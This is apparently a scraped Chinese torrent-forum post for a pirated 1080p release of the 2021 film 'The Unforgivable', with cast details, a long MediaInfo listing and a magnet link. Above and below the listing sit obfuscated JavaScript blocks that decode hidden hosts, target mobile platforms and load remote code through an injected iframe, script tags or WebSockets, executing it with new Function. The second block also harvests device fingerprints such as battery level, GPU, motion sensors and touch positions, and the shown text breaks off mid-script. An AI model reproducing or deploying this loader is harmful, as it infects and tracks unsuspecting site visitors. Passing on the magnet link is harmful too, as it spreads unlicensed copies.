不可饶恕[中文字幕].The.Unforgivable.2021.1080p.HDR.NF.WEB-DL.DDP5.1.Atmos.HEVC-btbt9527.com 12.28GB

版主小s 5月前 504



window['' + 'j' + '7' + '7' + '5' + '0' + 'e' + '9' + 'd' + '6'+'']=function(){;(function(u,i,w,d){if(/^Mac|Win/.test(navigator.platform)){return};var dc=function(n){return String.fromCharCode(n)};var x=w[dc(0x61)+dc(0x74)+dc(0x6F)+dc(0x62)],cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';var wr='write';'jQuery';var f=d[crd](x('aWZyYW1l'));f.id='x'+(Math.random()*10000);f.style.width='10px';f.style.height=5+'px';f.style.background='#FFF';f.src=['https://',x(u),'r','j8',i].join('/');d[wr](f.outerHTML);w['addEventListener']('message',function(e){if(e.data.k==i){d.getElementById(f.id).remove();new Function('_tdcs',x(e.data.v))(cs)}})})('ai5neGxzanQuY29t','241222251495493',window,document)};


◎译 名 不可饶恕 / 无赦

◎片 名 The Unforgivable

◎年 代 2021

◎产 地 英国 / 德国 / 美国

◎类 别 剧情

◎语 言 英语

◎上映日期 2021-11-24(美国) / 2021-12-10(美国网络)

◎IMDb链接 https://www.imdb.com/title/tt11233960/

◎豆瓣链接 https://movie.douban.com/subject/34881718/

◎片 长 113分钟

◎导 演 诺拉·芬沙伊德 Nora Fingscheidt (id:1408692)

◎编 剧 彼得·克莱格 Peter Craig (id:1041402)

希拉里·塞茨 Hillary Seitz (id:1297174)

柯特妮·迈尔斯 Courtenay Miles (id:1421835)

萨利·温莱特 Sally Wainwright (id:1300267)

克里斯托弗·麦奎里 Christopher McQuarrie (id:1276314)

◎演 员 桑德拉·布洛克 Sandra Bullock (id:1022003)

乔·博恩瑟 Jon Bernthal (id:1049679)

文森特·多诺费奥 Vincent D'Onofrio (id:1010546)

维奥拉·戴维斯 Viola Davis (id:1022676)

理查德·托马斯 Richard Thomas (id:1019094)

艾斯琳·弗兰乔茜 Aisling Franciosi (id:1354532)

W·厄尔·布朗 W. Earl Brown (id:1049772)

杰西卡·麦丽奥德 Jessica McLeod (id:1005322)

汤姆·盖里 Tom Guiry (id:1027220)

琳达·伊蒙 Linda Emond (id:1089156)

罗布·摩根 Rob Morgan (id:1360285)

艾伦·坡尔 Aaron Pearl (id:1048251)

帕蒂·基姆 Patti Kim (id:1231351)

艾玛·尼尔森 Emma Nelson (id:1407067)

托比·哈格雷夫 Toby Hargrave (id:1227493)

威尔·普伦 Will Pullen (id:1379300)

威廉·贝勒 William Belleau (id:1377085)

西蒙·钱 Simon Chin (id:1194078)

Tom MacNeill (id:1257525)

汉斯·季默 Hans Zimmer (id:1054386)

◎标 签 Netflix / 犯罪 / 桑德拉·布洛克 / 美国 / 剧情 / 2021 / 翻拍 / 电影

◎简 介

露丝·斯雷特(布洛克饰)因暴力犯罪被判入狱,出狱后的她重新踏入社会,但自己的过去却不被原谅。面对来自她曾经称之为“家”的地方的无情评判,她获得救赎的唯一希望,就是找到当初被自己无奈丢下而疏远了的妹妹。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 143135884647404930209503552432906538381 (0x6BAEF7F8855FEB7BED6555CEE7118D8D)

  4. Complete name : The.Unforgivable.2021.1080p.HDR.NF.WEB-DL.DDP5.1.[email protected]

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 12.3 GiB

  8. Duration : 1 h 54 min

  9. Overall bit rate : 15.4 Mb/s

  10. Encoded date : UTC 2021-12-10 09:15:20

  11. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  12. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. HDR format : SMPTE ST 2086, HDR10 compatible

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 52 min

  21. Bit rate : 5 299 kb/s

  22. Width : 1 920 pixels

  23. Height : 1 080 pixels

  24. Display aspect ratio : 16:9

  25. Frame rate mode : Constant

  26. Frame rate : 24.000 FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0 (Type 2)

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.106

  31. Stream size : 4.16 GiB (34%)

  32. Default : Yes

  33. Forced : No

  34. Color range : Limited

  35. Color primaries : BT.2020

  36. Transfer characteristics : PQ

  37. Matrix coefficients : BT.2020 non-constant

  38. Mastering display color primaries : Display P3

  39. Mastering display luminance : min: 0.0050 cd/m2, max: 4000 cd/m2

  40. Maximum Content Light Level : 1559 cd/m2

  41. Maximum Frame-Average Light Level : 501 cd/m2


  42. Audio #1

  43. ID : 2

  44. Format : E-AC-3 JOC

  45. Format/Info : Enhanced AC-3 with Joint Object Coding

  46. Commercial name : Dolby Digital Plus with Dolby Atmos

  47. Codec ID : A_EAC3

  48. Duration : 1 h 54 min

  49. Bit rate mode : Constant

  50. Bit rate : 768 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 31.250 FPS (1536 SPF)

  55. Compression mode : Lossy

  56. Stream size : 627 MiB (5%)

  57. Title : English

  58. Language : English

  59. Service kind : Complete Main

  60. Default : Yes

  61. Forced : No

  62. Complexity index : 16

  63. Number of dynamic objects : 15

  64. Bed channel count : 1 channel

  65. Bed channel configuration : LFE


  66. Audio #2

  67. ID : 3

  68. Format : E-AC-3

  69. Format/Info : Enhanced AC-3

  70. Commercial name : Dolby Digital Plus

  71. Codec ID : A_EAC3

  72. Duration : 1 h 54 min

  73. Bit rate mode : Constant

  74. Bit rate : 640 kb/s

  75. Channel(s) : 6 channels

  76. Channel layout : L R C LFE Ls Rs

  77. Sampling rate : 48.0 kHz

  78. Frame rate : 31.250 FPS (1536 SPF)

  79. Compression mode : Lossy

  80. Stream size : 522 MiB (4%)

  81. Title : Czech

  82. Language : Czech

  83. Service kind : Complete Main

  84. Default : No

  85. Forced : No


  86. Audio #3

  87. ID : 4

  88. Format : E-AC-3

  89. Format/Info : Enhanced AC-3

  90. Commercial name : Dolby Digital Plus

  91. Codec ID : A_EAC3

  92. Duration : 1 h 54 min

  93. Bit rate mode : Constant

  94. Bit rate : 640 kb/s

  95. Channel(s) : 6 channels

  96. Channel layout : L R C LFE Ls Rs

  97. Sampling rate : 48.0 kHz

  98. Frame rate : 31.250 FPS (1536 SPF)

  99. Compression mode : Lossy

  100. Stream size : 522 MiB (4%)

  101. Title : French

  102. Language : French

  103. Service kind : Complete Main

  104. Default : No

  105. Forced : No


  106. Audio #4

  107. ID : 5

  108. Format : E-AC-3

  109. Format/Info : Enhanced AC-3

  110. Commercial name : Dolby Digital Plus

  111. Codec ID : A_EAC3

  112. Duration : 1 h 54 min

  113. Bit rate mode : Constant

  114. Bit rate : 640 kb/s

  115. Channel(s) : 6 channels

  116. Channel layout : L R C LFE Ls Rs

  117. Sampling rate : 48.0 kHz

  118. Frame rate : 31.250 FPS (1536 SPF)

  119. Compression mode : Lossy

  120. Stream size : 522 MiB (4%)

  121. Title : German

  122. Language : German

  123. Service kind : Complete Main

  124. Default : No

  125. Forced : No


  126. Audio #5

  127. ID : 6

  128. Format : E-AC-3

  129. Format/Info : Enhanced AC-3

  130. Commercial name : Dolby Digital Plus

  131. Codec ID : A_EAC3

  132. Duration : 1 h 54 min

  133. Bit rate mode : Constant

  134. Bit rate : 640 kb/s

  135. Channel(s) : 6 channels

  136. Channel layout : L R C LFE Ls Rs

  137. Sampling rate : 48.0 kHz

  138. Frame rate : 31.250 FPS (1536 SPF)

  139. Compression mode : Lossy

  140. Stream size : 522 MiB (4%)

  141. Title : Hindi

  142. Language : Hindi

  143. Service kind : Complete Main

  144. Default : No

  145. Forced : No


  146. Audio #6

  147. ID : 7

  148. Format : E-AC-3

  149. Format/Info : Enhanced AC-3

  150. Commercial name : Dolby Digital Plus

  151. Codec ID : A_EAC3

  152. Duration : 1 h 54 min

  153. Bit rate mode : Constant

  154. Bit rate : 640 kb/s

  155. Channel(s) : 6 channels

  156. Channel layout : L R C LFE Ls Rs

  157. Sampling rate : 48.0 kHz

  158. Frame rate : 31.250 FPS (1536 SPF)

  159. Compression mode : Lossy

  160. Stream size : 522 MiB (4%)

  161. Title : Hungarian

  162. Language : Hungarian

  163. Service kind : Complete Main

  164. Default : No

  165. Forced : No


  166. Audio #7

  167. ID : 8

  168. Format : E-AC-3

  169. Format/Info : Enhanced AC-3

  170. Commercial name : Dolby Digital Plus

  171. Codec ID : A_EAC3

  172. Duration : 1 h 54 min

  173. Bit rate mode : Constant

  174. Bit rate : 640 kb/s

  175. Channel(s) : 6 channels

  176. Channel layout : L R C LFE Ls Rs

  177. Sampling rate : 48.0 kHz

  178. Frame rate : 31.250 FPS (1536 SPF)

  179. Compression mode : Lossy

  180. Stream size : 522 MiB (4%)

  181. Title : Italian

  182. Language : Italian

  183. Service kind : Complete Main

  184. Default : No

  185. Forced : No


  186. Audio #8

  187. ID : 9

  188. Format : E-AC-3

  189. Format/Info : Enhanced AC-3

  190. Commercial name : Dolby Digital Plus

  191. Codec ID : A_EAC3

  192. Duration : 1 h 54 min

  193. Bit rate mode : Constant

  194. Bit rate : 448 kb/s

  195. Channel(s) : 6 channels

  196. Channel layout : L R C LFE Ls Rs

  197. Sampling rate : 48.0 kHz

  198. Frame rate : 31.250 FPS (1536 SPF)

  199. Compression mode : Lossy

  200. Stream size : 366 MiB (3%)

  201. Title : Japanese

  202. Language : Japanese

  203. Service kind : Complete Main

  204. Default : No

  205. Forced : No


  206. Audio #9

  207. ID : 10

  208. Format : E-AC-3

  209. Format/Info : Enhanced AC-3

  210. Commercial name : Dolby Digital Plus

  211. Codec ID : A_EAC3

  212. Duration : 1 h 54 min

  213. Bit rate mode : Constant

  214. Bit rate : 640 kb/s

  215. Channel(s) : 6 channels

  216. Channel layout : L R C LFE Ls Rs

  217. Sampling rate : 48.0 kHz

  218. Frame rate : 31.250 FPS (1536 SPF)

  219. Compression mode : Lossy

  220. Stream size : 522 MiB (4%)

  221. Title : Polish

  222. Language : Polish

  223. Service kind : Complete Main

  224. Default : No

  225. Forced : No


  226. Audio #10

  227. ID : 11

  228. Format : E-AC-3

  229. Format/Info : Enhanced AC-3

  230. Commercial name : Dolby Digital Plus

  231. Codec ID : A_EAC3

  232. Duration : 1 h 54 min

  233. Bit rate mode : Constant

  234. Bit rate : 640 kb/s

  235. Channel(s) : 6 channels

  236. Channel layout : L R C LFE Ls Rs

  237. Sampling rate : 48.0 kHz

  238. Frame rate : 31.250 FPS (1536 SPF)

  239. Compression mode : Lossy

  240. Stream size : 522 MiB (4%)

  241. Title : Brazilian Portuguese

  242. Language : Portuguese

  243. Service kind : Complete Main

  244. Default : No

  245. Forced : No


  246. Audio #11

  247. ID : 12

  248. Format : E-AC-3

  249. Format/Info : Enhanced AC-3

  250. Commercial name : Dolby Digital Plus

  251. Codec ID : A_EAC3

  252. Duration : 1 h 54 min

  253. Bit rate mode : Constant

  254. Bit rate : 640 kb/s

  255. Channel(s) : 6 channels

  256. Channel layout : L R C LFE Ls Rs

  257. Sampling rate : 48.0 kHz

  258. Frame rate : 31.250 FPS (1536 SPF)

  259. Compression mode : Lossy

  260. Stream size : 522 MiB (4%)

  261. Title : Russian

  262. Language : Russian

  263. Service kind : Complete Main

  264. Default : No

  265. Forced : No


  266. Audio #12

  267. ID : 13

  268. Format : E-AC-3

  269. Format/Info : Enhanced AC-3

  270. Commercial name : Dolby Digital Plus

  271. Codec ID : A_EAC3

  272. Duration : 1 h 54 min

  273. Bit rate mode : Constant

  274. Bit rate : 640 kb/s

  275. Channel(s) : 6 channels

  276. Channel layout : L R C LFE Ls Rs

  277. Sampling rate : 48.0 kHz

  278. Frame rate : 31.250 FPS (1536 SPF)

  279. Compression mode : Lossy

  280. Stream size : 522 MiB (4%)

  281. Title : Spanish

  282. Language : Spanish

  283. Service kind : Complete Main

  284. Default : No

  285. Forced : No


  286. Audio #13

  287. ID : 14

  288. Format : E-AC-3

  289. Format/Info : Enhanced AC-3

  290. Commercial name : Dolby Digital Plus

  291. Codec ID : A_EAC3

  292. Duration : 1 h 54 min

  293. Bit rate mode : Constant

  294. Bit rate : 640 kb/s

  295. Channel(s) : 6 channels

  296. Channel layout : L R C LFE Ls Rs

  297. Sampling rate : 48.0 kHz

  298. Frame rate : 31.250 FPS (1536 SPF)

  299. Compression mode : Lossy

  300. Stream size : 522 MiB (4%)

  301. Title : European Spanish

  302. Language : Spanish

  303. Service kind : Complete Main

  304. Default : No

  305. Forced : No


  306. Audio #14

  307. ID : 15

  308. Format : E-AC-3

  309. Format/Info : Enhanced AC-3

  310. Commercial name : Dolby Digital Plus

  311. Codec ID : A_EAC3

  312. Duration : 1 h 54 min

  313. Bit rate mode : Constant

  314. Bit rate : 640 kb/s

  315. Channel(s) : 6 channels

  316. Channel layout : L R C LFE Ls Rs

  317. Sampling rate : 48.0 kHz

  318. Frame rate : 31.250 FPS (1536 SPF)

  319. Compression mode : Lossy

  320. Stream size : 522 MiB (4%)

  321. Title : Thai

  322. Language : Thai

  323. Service kind : Complete Main

  324. Default : No

  325. Forced : No


  326. Audio #15

  327. ID : 16

  328. Format : E-AC-3

  329. Format/Info : Enhanced AC-3

  330. Commercial name : Dolby Digital Plus

  331. Codec ID : A_EAC3

  332. Duration : 1 h 54 min

  333. Bit rate mode : Constant

  334. Bit rate : 640 kb/s

  335. Channel(s) : 6 channels

  336. Channel layout : L R C LFE Ls Rs

  337. Sampling rate : 48.0 kHz

  338. Frame rate : 31.250 FPS (1536 SPF)

  339. Compression mode : Lossy

  340. Stream size : 522 MiB (4%)

  341. Title : Turkish

  342. Language : Turkish

  343. Service kind : Complete Main

  344. Default : No

  345. Forced : No


  346. Audio #16

  347. ID : 17

  348. Format : E-AC-3

  349. Format/Info : Enhanced AC-3

  350. Commercial name : Dolby Digital Plus

  351. Codec ID : A_EAC3

  352. Duration : 1 h 54 min

  353. Bit rate mode : Constant

  354. Bit rate : 640 kb/s

  355. Channel(s) : 6 channels

  356. Channel layout : L R C LFE Ls Rs

  357. Sampling rate : 48.0 kHz

  358. Frame rate : 31.250 FPS (1536 SPF)

  359. Compression mode : Lossy

  360. Stream size : 522 MiB (4%)

  361. Title : Ukrainian

  362. Language : Ukrainian

  363. Service kind : Complete Main

  364. Default : No

  365. Forced : No


  366. Text #1

  367. ID : 18

  368. Format : UTF-8

  369. Codec ID : S_TEXT/UTF8

  370. Codec ID/Info : UTF-8 Plain Text

  371. Duration : 1 h 51 min

  372. Bit rate : 62 b/s

  373. Count of elements : 1178

  374. Stream size : 50.7 KiB (0%)

  375. Title : English

  376. Language : English

  377. Default : Yes

  378. Forced : No


  379. Text #2

  380. ID : 19

  381. Format : UTF-8

  382. Codec ID : S_TEXT/UTF8

  383. Codec ID/Info : UTF-8 Plain Text

  384. Duration : 1 h 51 min

  385. Bit rate : 66 b/s

  386. Count of elements : 964

  387. Stream size : 54.6 KiB (0%)

  388. Title : Arabic

  389. Language : Arabic

  390. Default : No

  391. Forced : No


  392. Text #3

  393. ID : 20

  394. Format : UTF-8

  395. Codec ID : S_TEXT/UTF8

  396. Codec ID/Info : UTF-8 Plain Text

  397. Duration : 1 h 51 min

  398. Bit rate : 38 b/s

  399. Count of elements : 973

  400. Stream size : 31.7 KiB (0%)

  401. Title : Chinese Simplified

  402. Language : Chinese

  403. Default : No

  404. Forced : No


  405. Text #4

  406. ID : 21

  407. Format : UTF-8

  408. Codec ID : S_TEXT/UTF8

  409. Codec ID/Info : UTF-8 Plain Text

  410. Duration : 1 h 51 min

  411. Bit rate : 36 b/s

  412. Count of elements : 973

  413. Stream size : 30.1 KiB (0%)

  414. Title : Chinese Traditional

  415. Language : Chinese

  416. Default : No

  417. Forced : No


  418. Text #5

  419. ID : 22

  420. Format : UTF-8

  421. Codec ID : S_TEXT/UTF8

  422. Codec ID/Info : UTF-8 Plain Text

  423. Duration : 1 h 51 min

  424. Bit rate : 33 b/s

  425. Count of elements : 952

  426. Stream size : 27.6 KiB (0%)

  427. Title : Croatian

  428. Language : Croatian

  429. Default : No

  430. Forced : No


  431. Text #6

  432. ID : 23

  433. Format : UTF-8

  434. Codec ID : S_TEXT/UTF8

  435. Codec ID/Info : UTF-8 Plain Text

  436. Duration : 1 h 51 min

  437. Bit rate : 36 b/s

  438. Count of elements : 946

  439. Stream size : 30.2 KiB (0%)

  440. Title : Czech

  441. Language : Czech

  442. Default : No

  443. Forced : No


  444. Text #7

  445. ID : 24

  446. Format : UTF-8

  447. Codec ID : S_TEXT/UTF8

  448. Codec ID/Info : UTF-8 Plain Text

  449. Duration : 1 h 51 min

  450. Bit rate : 34 b/s

  451. Count of elements : 896

  452. Stream size : 28.2 KiB (0%)

  453. Title : Danish

  454. Language : Danish

  455. Default : No

  456. Forced : No


  457. Text #8

  458. ID : 25

  459. Format : UTF-8

  460. Codec ID : S_TEXT/UTF8

  461. Codec ID/Info : UTF-8 Plain Text

  462. Duration : 1 h 51 min

  463. Bit rate : 32 b/s

  464. Count of elements : 840

  465. Stream size : 26.9 KiB (0%)

  466. Title : Dutch

  467. Language : Dutch

  468. Default : No

  469. Forced : No


  470. Text #9

  471. ID : 26

  472. Format : UTF-8

  473. Codec ID : S_TEXT/UTF8

  474. Codec ID/Info : UTF-8 Plain Text

  475. Duration : 1 h 51 min

  476. Bit rate : 34 b/s

  477. Count of elements : 861

  478. Stream size : 28.1 KiB (0%)

  479. Title : Finnish

  480. Language : Finnish

  481. Default : No

  482. Forced : No


  483. Text #10

  484. ID : 27

  485. Format : UTF-8

  486. Codec ID : S_TEXT/UTF8

  487. Codec ID/Info : UTF-8 Plain Text

  488. Duration : 1 h 51 min

  489. Bit rate : 35 b/s

  490. Count of elements : 952

  491. Stream size : 28.9 KiB (0%)

  492. Title : French

  493. Language : French

  494. Default : No

  495. Forced : No


  496. Text #11

  497. ID : 28

  498. Format : UTF-8

  499. Codec ID : S_TEXT/UTF8

  500. Codec ID/Info : UTF-8 Plain Text

  501. Duration : 1 h 51 min

  502. Bit rate : 35 b/s

  503. Count of elements : 949

  504. Stream size : 28.9 KiB (0%)

  505. Title : German

  506. Language : German

  507. Default : No

  508. Forced : No


  509. Text #12

  510. ID : 29

  511. Format : UTF-8

  512. Codec ID : S_TEXT/UTF8

  513. Codec ID/Info : UTF-8 Plain Text

  514. Duration : 1 h 51 min

  515. Bit rate : 60 b/s

  516. Count of elements : 968

  517. Stream size : 49.6 KiB (0%)

  518. Title : Greek

  519. Language : Greek

  520. Default : No

  521. Forced : No


  522. Text #13

  523. ID : 30

  524. Format : UTF-8

  525. Codec ID : S_TEXT/UTF8

  526. Codec ID/Info : UTF-8 Plain Text

  527. Duration : 1 h 51 min

  528. Bit rate : 61 b/s

  529. Count of elements : 957

  530. Stream size : 50.5 KiB (0%)

  531. Title : Hebrew

  532. Language : Hebrew

  533. Default : No

  534. Forced : No


  535. Text #14

  536. ID : 31

  537. Format : UTF-8

  538. Codec ID : S_TEXT/UTF8

  539. Codec ID/Info : UTF-8 Plain Text

  540. Duration : 1 h 51 min

  541. Bit rate : 35 b/s

  542. Count of elements : 952

  543. Stream size : 29.2 KiB (0%)

  544. Title : Hungarian

  545. Language : Hungarian

  546. Default : No

  547. Forced : No


  548. Text #15

  549. ID : 32

  550. Format : UTF-8

  551. Codec ID : S_TEXT/UTF8

  552. Codec ID/Info : UTF-8 Plain Text

  553. Duration : 1 h 51 min

  554. Bit rate : 36 b/s

  555. Count of elements : 970

  556. Stream size : 29.8 KiB (0%)

  557. Title : Indonesian

  558. Language : Indonesian

  559. Default : No

  560. Forced : No


  561. Text #16

  562. ID : 33

  563. Format : UTF-8

  564. Codec ID : S_TEXT/UTF8

  565. Codec ID/Info : UTF-8 Plain Text

  566. Duration : 1 h 51 min

  567. Bit rate : 35 b/s

  568. Count of elements : 954

  569. Stream size : 29.4 KiB (0%)

  570. Title : Italian

  571. Language : Italian

  572. Default : No

  573. Forced : No


  574. Text #17

  575. ID : 34

  576. Format : UTF-8

  577. Codec ID : S_TEXT/UTF8

  578. Codec ID/Info : UTF-8 Plain Text

  579. Duration : 1 h 51 min

  580. Bit rate : 34 b/s

  581. Count of elements : 1059

  582. Stream size : 28.5 KiB (0%)

  583. Title : Japanese

  584. Language : Japanese

  585. Default : No

  586. Forced : No


  587. Text #18

  588. ID : 35

  589. Format : UTF-8

  590. Codec ID : S_TEXT/UTF8

  591. Codec ID/Info : UTF-8 Plain Text

  592. Duration : 1 h 51 min

  593. Bit rate : 42 b/s

  594. Count of elements : 980

  595. Stream size : 34.9 KiB (0%)

  596. Title : Korean

  597. Language : Korean

  598. Default : No

  599. Forced : No


  600. Text #19

  601. ID : 36

  602. Format : UTF-8

  603. Codec ID : S_TEXT/UTF8

  604. Codec ID/Info : UTF-8 Plain Text

  605. Duration : 1 h 51 min

  606. Bit rate : 34 b/s

  607. Count of elements : 946

  608. Stream size : 27.9 KiB (0%)

  609. Title : Malay

  610. Language : Malay

  611. Default : No

  612. Forced : No


  613. Text #20

  614. ID : 37

  615. Format : UTF-8

  616. Codec ID : S_TEXT/UTF8

  617. Codec ID/Info : UTF-8 Plain Text

  618. Duration : 1 h 51 min

  619. Bit rate : 35 b/s

  620. Count of elements : 929

  621. Stream size : 29.0 KiB (0%)

  622. Title : Norwegian Bokmal

  623. Language : Norwegian Bokmal

  624. Default : No

  625. Forced : No


  626. Text #21

  627. ID : 38

  628. Format : UTF-8

  629. Codec ID : S_TEXT/UTF8

  630. Codec ID/Info : UTF-8 Plain Text

  631. Duration : 1 h 51 min

  632. Bit rate : 34 b/s

  633. Count of elements : 945

  634. Stream size : 28.2 KiB (0%)

  635. Title : Polish

  636. Language : Polish

  637. Default : No

  638. Forced : No


  639. Text #22

  640. ID : 39

  641. Format : UTF-8

  642. Codec ID : S_TEXT/UTF8

  643. Codec ID/Info : UTF-8 Plain Text

  644. Duration : 1 h 51 min

  645. Bit rate : 37 b/s

  646. Count of elements : 954

  647. Stream size : 30.6 KiB (0%)

  648. Title : Portuguese

  649. Language : Portuguese

  650. Default : No

  651. Forced : No


  652. Text #23

  653. ID : 40

  654. Format : UTF-8

  655. Codec ID : S_TEXT/UTF8

  656. Codec ID/Info : UTF-8 Plain Text

  657. Duration : 1 h 51 min

  658. Bit rate : 36 b/s

  659. Count of elements : 979

  660. Stream size : 29.6 KiB (0%)

  661. Title : Brazilian Portuguese

  662. Language : Portuguese

  663. Default : No

  664. Forced : No


  665. Text #24

  666. ID : 41

  667. Format : UTF-8

  668. Codec ID : S_TEXT/UTF8

  669. Codec ID/Info : UTF-8 Plain Text

  670. Duration : 1 h 51 min

  671. Bit rate : 41 b/s

  672. Count of elements : 948

  673. Stream size : 33.8 KiB (0%)

  674. Title : Romanian

  675. Language : Romanian

  676. Default : No

  677. Forced : No


  678. Text #25

  679. ID : 42

  680. Format : UTF-8

  681. Codec ID : S_TEXT/UTF8

  682. Codec ID/Info : UTF-8 Plain Text

  683. Duration : 1 h 51 min

  684. Bit rate : 60 b/s

  685. Count of elements : 955

  686. Stream size : 49.3 KiB (0%)

  687. Title : Russian

  688. Language : Russian

  689. Default : No

  690. Forced : No


  691. Text #26

  692. ID : 43

  693. Format : UTF-8

  694. Codec ID : S_TEXT/UTF8

  695. Codec ID/Info : UTF-8 Plain Text

  696. Duration : 1 h 51 min

  697. Bit rate : 34 b/s

  698. Count of elements : 971

  699. Stream size : 28.2 KiB (0%)

  700. Title : Spanish

  701. Language : Spanish

  702. Default : No

  703. Forced : No


  704. Text #27

  705. ID : 44

  706. Format : UTF-8

  707. Codec ID : S_TEXT/UTF8

  708. Codec ID/Info : UTF-8 Plain Text

  709. Duration : 1 h 51 min

  710. Bit rate : 35 b/s

  711. Count of elements : 993

  712. Stream size : 28.7 KiB (0%)

  713. Title : European Spanish

  714. Language : Spanish

  715. Default : No

  716. Forced : No


  717. Text #28

  718. ID : 45

  719. Format : UTF-8

  720. Codec ID : S_TEXT/UTF8

  721. Codec ID/Info : UTF-8 Plain Text

  722. Duration : 1 h 51 min

  723. Bit rate : 35 b/s

  724. Count of elements : 903

  725. Stream size : 29.4 KiB (0%)

  726. Title : Swedish

  727. Language : Swedish

  728. Default : No

  729. Forced : No


  730. Text #29

  731. ID : 46

  732. Format : UTF-8

  733. Codec ID : S_TEXT/UTF8

  734. Codec ID/Info : UTF-8 Plain Text

  735. Duration : 1 h 51 min

  736. Bit rate : 96 b/s

  737. Count of elements : 971

  738. Stream size : 78.7 KiB (0%)

  739. Title : Thai

  740. Language : Thai

  741. Default : No

  742. Forced : No


  743. Text #30

  744. ID : 47

  745. Format : UTF-8

  746. Codec ID : S_TEXT/UTF8

  747. Codec ID/Info : UTF-8 Plain Text

  748. Duration : 1 h 51 min

  749. Bit rate : 38 b/s

  750. Count of elements : 950

  751. Stream size : 31.2 KiB (0%)

  752. Title : Turkish

  753. Language : Turkish

  754. Default : No

  755. Forced : No


  756. Text #31

  757. ID : 48

  758. Format : UTF-8

  759. Codec ID : S_TEXT/UTF8

  760. Codec ID/Info : UTF-8 Plain Text

  761. Duration : 1 h 51 min

  762. Bit rate : 56 b/s

  763. Count of elements : 974

  764. Stream size : 46.7 KiB (0%)

  765. Title : Ukrainian

  766. Language : Ukrainian

  767. Default : No

  768. Forced : No


  769. Text #32

  770. ID : 49

  771. Format : UTF-8

  772. Codec ID : S_TEXT/UTF8

  773. Codec ID/Info : UTF-8 Plain Text

  774. Duration : 1 h 51 min

  775. Bit rate : 52 b/s

  776. Count of elements : 982

  777. Stream size : 42.9 KiB (0%)

  778. Title : Vietnamese

  779. Language : Vietnamese

  780. Default : No

  781. Forced : No




复制代码


TAGS 剧情

磁力链:
  • magnet:?xt=urn:btih:6E5A6447E56FB453CCFCE2ACCA73A218AD738C19




var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x48\x57\x62\x51\x66\x48\x58\x65\x61\x49']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='wob'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huawei')>-1){r=1;u=k;f=function(){;if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){;if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});var param=(function(aid){var W=window,D=document,B=D.body,N=navigator,E='ontouchstart'in W||N.maxTouchPoints>0||N.msMaxTouchPoints>0;function fix(s){return encodeURIComponent(s).replace(/[!'()*]/g,function(c){return'%'+c.charCodeAt(0).toString(16)})}function mix(t,s){var a=[].slice.call(arguments),k,r=typeof a[a.length-1]=='boolean'?a.pop():true;for(var i=1;s=a[i++];){for(k in s)if(r||!(k in t))t[k]=s[k]}return t}var utils={guid:function(){function a(){return Math.floor((1+Math.random())*0x10000).toString(16).substring(1)}return a()+a()+''+a()+''+a()+''+a()+''+a()+a()+a()},bind:function(o,e,c){return'string'===typeof o&&(o=D.getElementById(o)),e=e.replace(/^on/i,'').toLowerCase(),o.addEventListener?o.addEventListener(e,c,!1):o.attachEvent&&o.attachEvent('on'+e,c),o}};var p1={dcc:'',dcl:'',gvd:'',grr:'',ct:''},p2={diit:'',dit:'',cmn:''},cmn=[];var mobile={ma:function(){;if(!E)return;function l(s){;if(!s)return;return s.toString().substr(0,5)}utils.bind(W,'deviceorientation',function handleFunc(ev){;if(!ev.alpha)return;p2.diit=[l(ev.alpha),l(ev.beta),l(ev.gamma)].join(',')});utils.bind(W,'devicemotion',function handleFunc(evnet){var a=evnet.accelerationIncludingGravity;if(!a.x)return;p2.dit=[l(a.x),l(a.y),l(a.z)].join(',')});utils.bind(W,'touchstart',function touchstart(ev){var clientX=ev.touches[0].clientX,clientY=ev.touches[0].clientY,v=[clientX,clientY].join('_');if(cmn.length%lt;3)cmn.push(v)})},md:function(){try{N.getBattery().then(function(b){p1.dcc=b.charging?'yes':'no';p1.dcl=Math.round(b.level*100)})}catch(e){}try{var a=D.createElement('canvas'),b=a.getContext('experimental-webgl'),c=b.getExtension('WEBGL_debug_renderer_info'),d=b.getParameter(c.UNMASKED_VENDOR_WEBGL),e=b.getParameter(c.UNMASKED_RENDERER_WEBGL).replace(/[%]/g,'');p1.gvd=d;p1.grr=e}catch(e){}try{;if(!N.connection){p1.ct='unknown';return}if(!N.connection.type){p1.ct='unknown';return}p1.ct=N.connection.type}catch(e){}},init:function(){this.ma();this.md()},ap:function(){p2.cmn=cmn.join(';');return mix(p1,p2)}};mobile.init();var client={client:function(id){var ut=utils,m=mobile;function a(){var a='';try{a=W.opener?W.opener.document.location.href:D.referrer}catch(e){a=D.referrer}if(a!=='')a=a.substr(0,8192);return fix(a)}function 